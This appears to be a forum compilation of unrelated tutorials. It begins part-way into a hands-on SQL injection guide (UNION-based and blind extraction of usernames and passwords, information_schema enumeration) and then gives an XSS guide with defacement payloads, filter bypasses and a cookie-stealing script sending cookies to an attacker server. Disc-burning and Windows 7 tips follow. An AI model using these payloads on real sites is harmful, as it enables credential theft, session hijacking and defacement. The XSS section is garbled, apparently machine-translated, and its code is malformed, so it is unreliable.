http://www.site.com/news.php?id=5 order by 1/* <-- no error http://www.site.com/news.php?id=5 order by 2/* <-- no error http://www.site.com/news.php?id=5 order by 3/* <-- no error http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that) that means that the it has 3 columns, cause we got an error on 4. 3). Check for UNION function With union we can select more data in one sql statement. so we have http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). ) if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :) 4). Check for MySQL version http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try -- it's a comment and it's important for our query to work properly. let say that we have number 2 on the screen, now to check for version we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar. it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/* if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." i didn't see any paper covering this problem, so i must write it :) what we need is convert() function i.e. http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* or with hex() and unhex() i.e. http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* and you will get MySQL version :D 5). Getting table and column name well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up :)

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat() , i decribe it earlier.

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

That's all in this part, now we can proceed on harder part :)

2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true and the page loads normally, that's ok. now the real test http://www.site.com/news.php?id=5 and 1=2 <--- this is false so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection. 1) Get the MySQL version to get the version in blind attack we use substring i.e http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 this should return TRUE if the version of MySQL is 4. replace 4 with 5, and if query return TRUE then the version is 5. i.e http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5 2) Test if subselect works when select don't work then we use subselect i.e http://www.site.com/news.php?id=5 and (select 1)=1 if page loads normally then subselects work. then we gonna see if we have access to mysql.user i.e http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1 if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE. 3). Check table and column names This is part when guessing is the best friend :) i.e. http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.) then if the page loads normally without content missing, the table users exits. if you get FALSE (some article missing), just change table name until you guess the right one :) let's say that we have found that table name is users, now what we need is column name. the same as table name, we start guessing. Like i said before try the common names for columns. i.e http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 if the page loads normally we know that column name is password (if we get false then try common names or just guess) here we merge 1 with the column password, then substring returns the first character (,1,1) 4). Pull data from database we found table users i columns username password so we gonna pull characters from that. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D

Hope you learned something from this paper.

Have FUN! (:

XSS Tutorial

Section 1 - Understanding XSS
"CSS", also known as "xss" (confused with Cascading Style Sheets Cross Site Scripting) is an open web applications often encountered. attacker to add malicious code xss recognizes opportunities. many types is possible xss attacks. Now here I stand on the most widely used 3 of them will.
I want to talk about the first round of attacks xss URL. This method will not remain on the page xss means. Xss in this case, just get the code and press "submit" we will try to. How we use our own benefit so that more will be mentioned.

The second attack is in the input field. Where would you add Data Add xss often. As an example, using a search engine, we find a great site. Search box "hacker", and he's started. If a page is loaded class that "hacker" found 100 results for the data displayed on the page will see. The case now or run the code? This attack is not possible to run PHP code in HTML and Javascript code to run, but it is possible. In the meantime, make sure this method will not stay on the server.

Third attack method, this method can be added with the code and the code on the site will be permanent. Running PHP and HTML code have two types that are connected. If we inject the same HTML as if we can inject PHP. This kind of attack is usually blogs and profile. Forums and the most you can add data rather than stay in the area where no data are included. HTML, PHP is very different. HTML on your computer, "download" is it in your browser and solutions (and therefore may view page source). With PHP code, which is hosted on the server script is parsed, then the data is sent back to the browser. PHP injection is extremely rare for this condition. Note: PHP code can never be injected into the HTML page.

Section 2 - Finding XSS Open

To find this open blogs, Forums, Shout boxes, comment boxes and you can start by trying search box. In fact, it is possible to give more examples here, nor mentioned.
Google can be used to more easily find Dorks. As an example, by typing google.com inurl: "search.php? Q =" You can write. Now this is a page that can be found very common and many results can be obtained. Attack to find more go to my other plenty. Also note that most of the site's xss vulnerability and a good eye and a bit to find it in the filter to have information about how to do bypass is enough.

Chapter 3 - Basic Concepts on xss

Now the most commonly used to learn from the most common xss to get started.
The most common one <script>alert("xss")</script>.

This code "xss" without the quotation marks, easily editable tab a "popup" warning will.
Therefore, assuming that you mentioned action Remember return to the previous issue, we search.php? Q = a web site that simply can try on.
=<script> http://site.com/search.php?q alert("xss")</script>

It probably will work, but still does not work, no problem, look at the different sites, although you can experiment with variations. (Too many people, just add HTML is not Javascript aware that they do not think)

<br> <b> <u> http://site.com/search.php?q = xss </ u> </ b>

If the text is written in bold font and news are open if you push on relevance, and now I know that later we will explain methods you can use.

Chapter 4 - Attack Methods

Yes, now how does it work xss learned it, now we can explain some xss Deface methods. There are many methods that can be used to Deface the most effective and most common of them and I'll stand on.

IMG SRC The first one. For who do not know HTML IMG SRC, the official web site link's he used to show the tags.

<html> <body> <IMG src= "http://site.com/yourDefaceIMAGE.png">

Link link with a picture if the current changes, record and will run better understand what I mean.
Now let's say Shout box, Comment box or you've entered your data and confirm, after entering the data that you have found any place showing. Given below have to show picture on the page then I can add a link.
<IMG Src= "http://site.com/yourimage.png">

Do not need them because the page already contains other tags.
This enables your image to appear larger and the site is clearly hacked.
Another method is the use of flash video. The following methods are the same but with a little more different is a way.

<EMBED Src= "http://site.com/xss">
Here, the flash video itself will be executed links.
Pop or routing may be used or
<script> window.open ( "http://www.google.com/" )</script>

Chapter 5 - Cookie (Cookie)

Let cookie in logger's site. Now we obtain the file and upload a.php shaped our files are. Log.txt file to create Do not forget to chmod 777 var. Now in any attack, we can perform, a site which is open xss found. Now add the water code;

window.location = "cookie http://yourserver.co...kielogger.php?c ="+<script>.
or
<srcipt>. location = "cookie http://yourServer.co...kielogger.php?c ="+</script>.

Then if you visit the site if the user will be eaten cookie logger. The required information has been sent to the site and cookies will be stolen. The second part is a more clandestine. Add to your file, and then the user's session cookies for the forward. But if you say that such an attack or the possibility of our site, but only the data shows a time and does not hide it? Let us say that we search.php? Q = I in our hands a page, we use the code below and maybe we can get him a malicious url hex code, and people probably will base64 encode it

=<script>. http://site.com/search.php?q location = "http://yourServer.com/cookielogger.php?c ="+</script> . cookie

Section 6 - Filtering Process to bypass

On most sites, there may seem hungry, but the code does not run, you better make a note of this section to solve. Used to bypass filtering process, some common methods;

') alert (' xss');
or
"); alert ( 'xss');

They are open on a server with this code <script>alert("xss")</script> they do the same thing. Data to confirm before you can try to Hexing or base 64 encoding. Be sure to water issues; xss's to test ( "xss") to use caution at all to do a good method is not practical because of the sites that I block letters xss know.
Other ways to bypass filtering;

<script Type = text / javascript>alert("PlanetCreator")</script>
<script>alert( "PlanetCreator")</script>;
<script>alert( PlanetCreator");</script>
<script>alert( PlanetCreator"/)<script>
There <script> var = 1; alert (var )</script>

Chapter 7 - Advanced Level xss

This section discusses the main methods which I will examine the firm that is used even more of myself I did not find any ways, I'm sure you will like."Magic Signals" is hungry and therefore use some commands I have seen many sites that make unnecessary. However, using fractions, a technique I met them ASCII's turn.

Necessary functions to convert the fractional numbers ASCII's a table containing all
Ascii Table - ASCII character codes and html, octal, hex and decimal chart conversion site can be found. What you want to print this table will help you to write it.

80 108 97 110 101 116 67 114 101 97 116 111 114

Yes, now we get string's decimal values, the things we need to know what function it into Javascript.

String.fromCharCode()

This code is suitable for this kind of thing, installation is easy. We give the following from my own argument.

String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114)

Yes now
"String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114)"
"PlanetCreator" expression JAVA (ASCII) are in the tab.

And icons for use with this warning, etc. do not need anything because it already serves as the variable itself.

alert (String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114))

Now in this case "PlanetCreator" tab will show. And this method is called the magic mark is a number in the bypass cursors.
Before continuing to the next section, again using another method of variables than I would like to talk about.
Let's write something to say;

var myVar = 1
myVar longer a tab of saying here are 1.

To use our own favor xss's variables, we can write as follows;

There <script> myVar = 1; alert (myVar )</script>
Here, the variable contents of any sign (quote) without the use will be displayed.

Chapter 8 - xss safety

This section is intended for web developers. How to prepare the code you can make it I will talk about security.
If found to open script' xss URLs, you secure is very simple. Take a look at the following code to tell;
if (isset ($ _POST [ 'form'])){ echo "<html> <body>". $ _POST [' form ']. "</ body> </ html>"

Let's say that $ _POST [ 'from'] variable, and the leak was coming from any input dialog box have been exposed to xss attack. To ensure the security of the latter method is very simple;

$ charset = 'UTF-8', $ data = htmlentities ($ _POST [ 'form'], ENT_NOQUOTES, $ charset);
if (isset ($ data)) (echo "<html> <body>". $ data. "</ body> </ html>"

This line of code will be possible and all of them Share

How to make Bin/Cue, and ISO

For ISO also read the BIN/CUE then see ISO. The ISO is like BIN, but ISO does not use CUE, you can use Nero,alcohol120% to burn it or emulate with alcohol or daemon tools.

BIN/CUE
The .bin file is the single file containing the contents of the CD,DVD which you downloaded. You will also have a .cue file (much smaller size) which goes with the large .bin file. Together, they create the complete "image" of the CD,DVD you chose to download. The purpose of the .cue file is to tell your burning software (for eg, Nero) exactly how to record the data present in the .bin file. Once you have the .bin file and the .cue file for each disc, you may burn the file onto a blank CD-R or DVD. We suggest using Nero or Alcohol 120%.

ISO
Along with the large capacity hard disk popularity, people were already used to coping compact discs to CD/DVD image files, generally used is the famous ISO 9660 international standards format, therefore CD/DVD image files are called ISO files. Because the ISO file retained complete data information of the compact disc (including compact disc boot information), you were allowed the convenience to use commonly used CD/DVD burning software (for example Nero-Burning ROM ) to record the disc with your CD-R/RW or DVD-R/RW over and over forever, it can also be used directly through Virtual CD/DVD-ROM drive software (for example Daemon-Tools ) .

How to burn?
Burn them onto a blank CD using the info from .cue
Insert the disc into your CD drive and install the program or game.

Note about burning:
Do not burn it as data cd. Your program should have a wizard for burning images and there you will select the .Cue and it'll give the instructions about how to burn the .Bin. In Alcohol 120% is very easy to do that.
Also .Cue and .Bin should be in the same folder if not it don't work.

Note:

Unless otherwise stated, .bin files burn perfectly fine on a normal 700MB CD even though they may seem too big, just ignore the .bin file size. Once you start burning with either Nero or Alcohol, it will tell you the actual size of the .bin file, which will always end up well under 700MB so you have no worries.

I don't have a cd or I don't want to waste one

Then you may do what?s called ?emulating? an ISO or .Bin. This entails making your computer believe it has a new cd-rom drive and that you just inserted the disc into it corresponding to what CD image you load. This can most easily be accomplished with either of two programs: Alcohol 120% or Daemon Tools. Selecting to ?Mount? a disc image in either of the two programs will result in your computer thinking you?ve inserted the disc and you can install or play from there, straight off your hard drive without ever having needed to burn a disc.

How in daemon tools

Right-click on the DAEMON Tools tray-icon
Select Virtual CD/DVD-ROM
Select Device [X]

Click Mount
Browse and select the image you wish to mount
Click OK or double-click on the file to mount.

I don't have a CUE.. What should I do?

Answer: You can create a .cue, here are the steps..

1) Open notepad and put this in it :

FILE "image-name.BIN" BINARY
TRACK 1 MODE2/2352
INDEX 1 00:00:00

2) Change where says "image-name.Bin" to the exact name of your .bin.
Then go to save as and put there save it as "all the files"and put the exacly name of the .BIN just without .BIN and of extension put .CUE and you'll have the .BIN.

BURNING GUIDE WITH CLONE CD (.CCD/.IMG/.SUB set)
1) Open CloneCD
2) Click the second button (Write From Image File)
3) Click 'Browse' and load the .CCD file, then 'Next'
4) The next screen is tricky. Depending upon the icon you choose, CloneCD activates some write option that, on some CDs, may help copying the protection scheme. Try choosing among the default settings or look on the net for the proper settings if you know you're dealing with a protected CD (laserlock, safedisc etc.)
5) OK will activate burning.

BURNING GUIDE WITH ALCOHOL 120% (nearly all image types)
1) Open Alcohol 120%
2) Click on 'Image Burning Wizard'
3) push 'Browse' then load the proper file(.CUE, .CCD, .ISO) file.

6) Change the 'Datatype' drop-down menu according to the protectionyou detected on the original CD (or image). In this example we set 'Playstation' since the CD is a PSX CD. You'll notice that this setting automatically changes Write Method from DAO/SAO to RAW DAO and deselects 'rectify Sub-Channel Data'. Different Datatypes will activate different settings.
6) The write speed is set accordingly to your system resources. Just avoid burning at high speed for PSX CDs (since PSX CD-ROM sucks). Click 'Start' to start burning.
7) On the next screen you are able to keep track of the burning process. Avoid using too many system resources during the burning process.
Cool A popup will inform you at the ending of the burning. The Backup CD has been completed!

BURNING GUIDE WITH CDRWin (.CUE/.BIN or .CUE/.IMG sets)
1) Open CDRWin.
2) Do not try to unlock CDRWin with illegal codes found on the net: the program will seem to unlock in any case but it will burn coasters if the code is not correct.
3) Click the first button 'Record Disc'
4) Click 'Load Cuesheet' button and load the proper .CUE file. Please note that if you receive errors maybe the image path written on the .CUE might be uncorrect. In this case open the .CUE file with Notepad and check that on the 1st row (FILE "...." BINARY) the correct path of the image (the large file that came with the .CUE) is written. Otherwise, correct it.
5) If you can, click on the 'RAW Mode' button. This is not always necessary, except when the CD is protected. All other options are left blank.
6) Click on 'Start Recording'.

Windows 7 Tip and Tweaks

Windows 7 Keyboard Shortcuts

Let's kick off with keyboard shortcuts – the first thing every power user must memorize with working with a new operating system.
Alt + P

In Windows Explorer, activate an additional file preview pane to the right side of the window with this new shortcut. This panel is great for previewing images in your photos directory.
Windows + + (plus key)
Windows + - (minus key)

Pressing the Windows and plus or minus keys activates the Magnifier, which lets you zoom in on the entire desktop or open a rectangular magnifying lens to zoom in and out of parts of your screen. You can customize the Magnifier options to follow your mouse pointer or keyboard cursor. Keep in mind that so far, the Magnifier only works when Aero desktop is enabled.
Windows + Up
Windows + Down

If a window is not maximized, pressing Windows + Up will fill it to your screen. Windows + Down will minimize that active window. Unfortunately, pressing Windows + Up again while a window is minimized won’t return it to its former state.
Windows + Shift + Up

Similar to the shortcut above, hitting these three keys while a window is active will stretch it vertically to the maximum desktop height. The width of the window will however stay the same. Pressing Windows + Down will restore it to its previous size.
Windows + Left
Windows + Right

One of the new features of Windows 7 is the ability to automatically make a window fill up half of your screen by dragging to the left or right. This pair of shortcuts performs the same function without your mouse. Once a window is fixed to one side of the screen, you can repeat the shortcut to flip it to the other side. This is useful if you’re extending a desktop across multiple monitors, which prevents you from executing this trick with a mouse.
Windows + Home

This shortcut performs a similar function to hovering over a window’s peek menu thumbnail in the Taskbar. The active window will stay on your desktop while every other open application is minimized. Pressing this shortcut again will restore all the other windows.
Windows + E

Automatically opens up a new Explorer window to show your Libraries folder.
Windows + P

Manage your multiple-monitor more efficiently with this handy shortcut. Windows + P opens up a small overlay that lets you configure a second display or projector. You can switch from a single monitor to dual-display in either mirror or extend desktop mode.
Windows + Shift + Left
Windows + Shift + Right

If you are using two or more displays (and who isn’t, these days?), memorize this shortcut to easily move a window from one screen to the other. The window retains its size and relative position on the new screen, which his useful when working with multiple documents. Utilize that real estate!
Windows + [Number]

Programs (and new instances) pinned to your Taskbar can be launched by hitting Windows and the number corresponding to its placement on the Taskbar. Windows + 1, for example, launches the first application, while Windows + 4 will launch the fourth. We realize that this is actually one key-press more than just clicking the icon with your mouse, but it saves your hand the trouble of leaving the comfort of the keyboard.
Windows + T

Like Alt + Tab (still our all time favorite Windows specific shortcut), Windows + T cycles through your open programs via the Taskbar’s peek menu.
Windows + Space

This combo performs the same function as moving your mouse to the bottom right of the Taskbar. It makes every active window transparent so you can view your desktop. The windows only remain transparent as long as you’re holding down the Windows key.
Ctrl + Shift + Click

Hold down Ctrl and Shift while launching an application from the Taskbar or start menu to launch it with full administrative rights.
Ctrl + Click

Hold down Ctrl while repeatedly clicking a program icon in the Taskbar will toggle between the instances of that application, like multiple Firefox windows (though not browser tabs).

Calibrate Text Rendering and Color

The first thing you need to do after a clean install of Windows 7 on a laptop is to tune and calibrate CleartType text and Display Color. Windows 7 includes two built-in wizards that run you through the entire process, pain free.

Launch ClearType Text Tuning by typing “cttune” in the Start Menu search field and opening the search result. You’ll go through a brief series of steps that asks you to identify the best-looking text rendering method.

For Display Color Calibration – very useful if you’re using Windows 7 with a projector or large-screen LCD – search and launch “dccw” from the Start Menu. It’ll run you through a series of pages where you can adjust the gamma, brightness, contrast, and color of the screen to make images look their best.

Better Font Management and a New Graceful Font

Font management is much improved in Windows 7. Gone is the “Add Fonts” dialog , replaced with additional functionality in the Fonts folder. First, the folder shows font previews in each font file’s icon (viewed with Large or Extra Large icons). Fonts from a single set will no longer show up as different fonts and are now combined as a single family (which can be expanded by double clicking the icon). You can also toggle fonts on and off by right clicking a font icon and selected the “hide” option. This will prevent applications from loading the font (and therefore save memory), but keep the file retained in the Font folder.

A new font called Gabriola also comes bundled with Windows 7, which takes advantage of the new OpenType and DirectWrite (Direct2D) rendering.
The Gaming Grotto is a Less Ghetto

One of our biggest pet peeves of Windows Vista is the Games Folder, which we not-so-affectionately refer to as the Gaming Grotto. Games for Windows titles and other game shortcuts would automatically install to this directory, which we could only access with a Start Menu shortcut. The concept wasn’t bad except for the fact that it prevented us from starting a game up from the Start Menu search bar. We could call up any other program by typing its name in the Start Menu field except the games installed to the Games Folder. Fortunately, this oversight is fixed in Windows 7.

Become More Worldly with Hidden Wallpapers

Windows 7 Beta comes with the Betta fish as its default desktop wallpaper, but it also includes six desktop backgrounds catered to your region (as identified when you first installed the OS). US users, for example, get six 1900x1200 images showing off famous National Parks and beaches. The available wallpapers for other regions are still included in a hidden folder.

To access these international wallpapers, bring up the Start Menu search bar and type “Globalization”. The only result should be a folder located in the main Windows directory. You should only be able to see “ELS and “Sorting” folders here so far. Next, search for “MCT” in the top right search bar. This will display five new unindexed folders, each corresponding to a different global region. Browse these folders for extra themes and wallpapers!

Take Control of UAC

Despite good intentions, User Account Control pop-ups were one of the most annoying aspects of Vista, and a feature that most of us immediately disabled after a clean install. UAC in Windows 7 displays fewer warnings, but you can also fine-tune its notification habits by launching the UAC Settings from the start menu. Just type “UAC” in the Start Menu search field and click the result. We find that setting just above “Never notify” gives a comfortable balance between mindful security and incessant nagging.

Calculate your Mortgage and Other Maths Tricks

Wordpad and Paint aren’t the only upgraded programs in Windows 7. The reliable Calculator applet has been beefed up to do more than just basic arithmetic. In Vista, the Calculator had Standard and Scientific modes. Now, you can toggle between Standard, Scientific, Programmer, and even Statistics modes.

In addition, the Options menu lets you pull out many new automated conversation tools, such has Unit Conversion (ie. Angles, Temperature, Velocity, or Volume) and Date Calculation (calculate the difference between two dates). More templates give you the ability to crunch Gas Mileage, Lease, and even Mortgage estimates based on any variables you input.

Track Your Actions with Problem Steps Recorder

The primary reason for releasing the Windows 7 Beta was for Microsoft’s developers to get feedback from users. (Notice the glaring Send Feedback link at the top of every window?) In addition, the devs have built in a diagnostic tool called Problem Steps Recorder that combines screen captures with mouse tracking to record your actions. You can launch this program from the Start Menu by typing “psr.exe” in the search field.

Hit the Record button and Problem Steps Recorder starts tracking your mouse and keyboard input while taking screenshots that correspond with each new action. Stop recording and your session is saved to an HTML slide show recreating your steps, in which you can add comments and annotations. It’s particularly useful if you need to create a tutorial for a computer-illiterate relative.
Explore from “My Computer”

Windows Explorer’s default landing folder is the Libraries directory, but some of us are more comfortable with using “My Computer” as the default node, especially if we use multiple hard drives and external storage devices.

To change the default node, find Windows Explorer in the Start Menu by typing “explorer” in the Start Menu search field and right click the first result. Select “Properties”. Under the Shortcut tab, the Target location should read: %SystemRoot% and the Target should be: %SystemRoot%\explorer.exe

Paste the following in the Target field: %SystemRoot%\explorer.exe /root,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}

New instances of Explorer will open up to “My Computer”. You’ll need to unpin and replace the existing Explorer shortcut from the Taskbar to complete the transition. Just right-click the icon, hit, “Unpin this program from the taskbar” to remove it, and then drag Explorer from the Start Menu back into place.
Burn, Baby, Burn

No more messing around with malware-infected free burning software – Windows 7 comes loaded with DVD and CD ISO burning software. Double-click your image file and Windows will start a tiny program window to help burn your disc. It’s a barebones app, but it works!

Reveal All of Your Drives

If you use built-in memory card readers in a 3.5” drive bay or on your Dell Monitor, empty memory card slots will not show up as drives in My Computer. But that doesn’t mean they’re not still there! To reveal hidden memory card slots, open up My Computer. Press Alt to show the toolbar at the top of the screen, and go to Folder Options under Tools. Hit the View tab and uncheck the “Hide empty drives in the Computer folder” option.

Arrange Your Taskbar (System Tray, Too)

The programs that you pin to your Taskbar can be moved around to any order you want, whether they’re just shortcut icons or actually active applications. We recommend moving frequently used programs and folders to the front of the stack, so it’ll be easily to launch them with the aforementioned Windows + [number] shortcut. The Taskbar, if unlocked, can also be dragged to latch to the left, right, or even top of your desktop. Windows 7 improves side-docked Taskbar support with better gradient rendering and shortcut support. It really works well if you’re using a widescreen monitor.

Just as the Taskbar icons can be rearranged at will, the icons in the System Tray (actually called Notification Area) can be dragged and set to any order as well. Hidden Icons can be dragged back into view, and you can hide icons by dropping them into the Hidden Icon well – which is easier than working through the Notification Area Customization menu.
Bring Quick Launch Back from the Dead

The Quick Launch is superfluous with the presence of the updated Taskbar, but you can still bring it back with the following steps:

• Right-click the Taskbar, hover over Toolbars, and select New Toolbar.
• In the Folder selection field at the bottom, enter the following string:
%userprofile%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
• Turn off the “lock the Taskbar” setting, and right-click on the divider. Disable “Show Text” and “Show Title” and set the view option to “Small Icons”.
• Drag the divider to rearrange the toolbar order to put Quick Launch where you want it, and then right-click the Taskbar to lock it again.

Cling to Vista’s Taskbar

Let’s start with the bad news: Windows 7 eliminates the option to use the classic grey Windows 2000-style Taskbar. You’re also committed to the modern version of the Start Menu. But the good news is that you can still tweak the Taskbar to make it run like it did in Windows Vista – replacing the program icons with full names of each open app.

Right-click the Taskbar and hit properties. Check the “use small icons” box and select “combine when Taskbar is full” from the dropdown menu under Taskbar buttons. You still get the peekview thumbnail feature of the Taskbar, and inactive program remain as single icons, but opened programs will display their full names. Combine this with the old-school Quick Launch toolbar to complete the Vista illusion.

Banish Programs to the System Tray

All active programs show up as icons on the Taskbar, whether you want them to or not. While this is useful for web browsing or word processing, your taskbar can get cluttered up with icons you would normally expect to be hidden away, like for Steam or a chat client. You can keep active instances of these programs hidden away in the System Tray/Notification Area by right-clicking their shortcuts, navigating to the Compatibility tab, and selecting “Windows Vista” under the Compatibility Mode drop-down menu. This only works for programs that would previously hide away from the Taskbar in Vista.

Accelerate your Start Menu

The Start Menu hasn’t changed much from Vista, but there are some notable improvements. The default power button is thankfully changed to Shut Down the system, as opposed to Hibernation, as it was in Vista. This can be changed to do other actions from the Start Menu Properties menu.

Additional customization brings Videos and Recorded TV as links or menus to the right side of the Start Menu, next to your Documents, Music, and Games. Feel free to mess around the Customization options since you can always return to the default Start Menu settings by clicking the “default” button at the bottom.
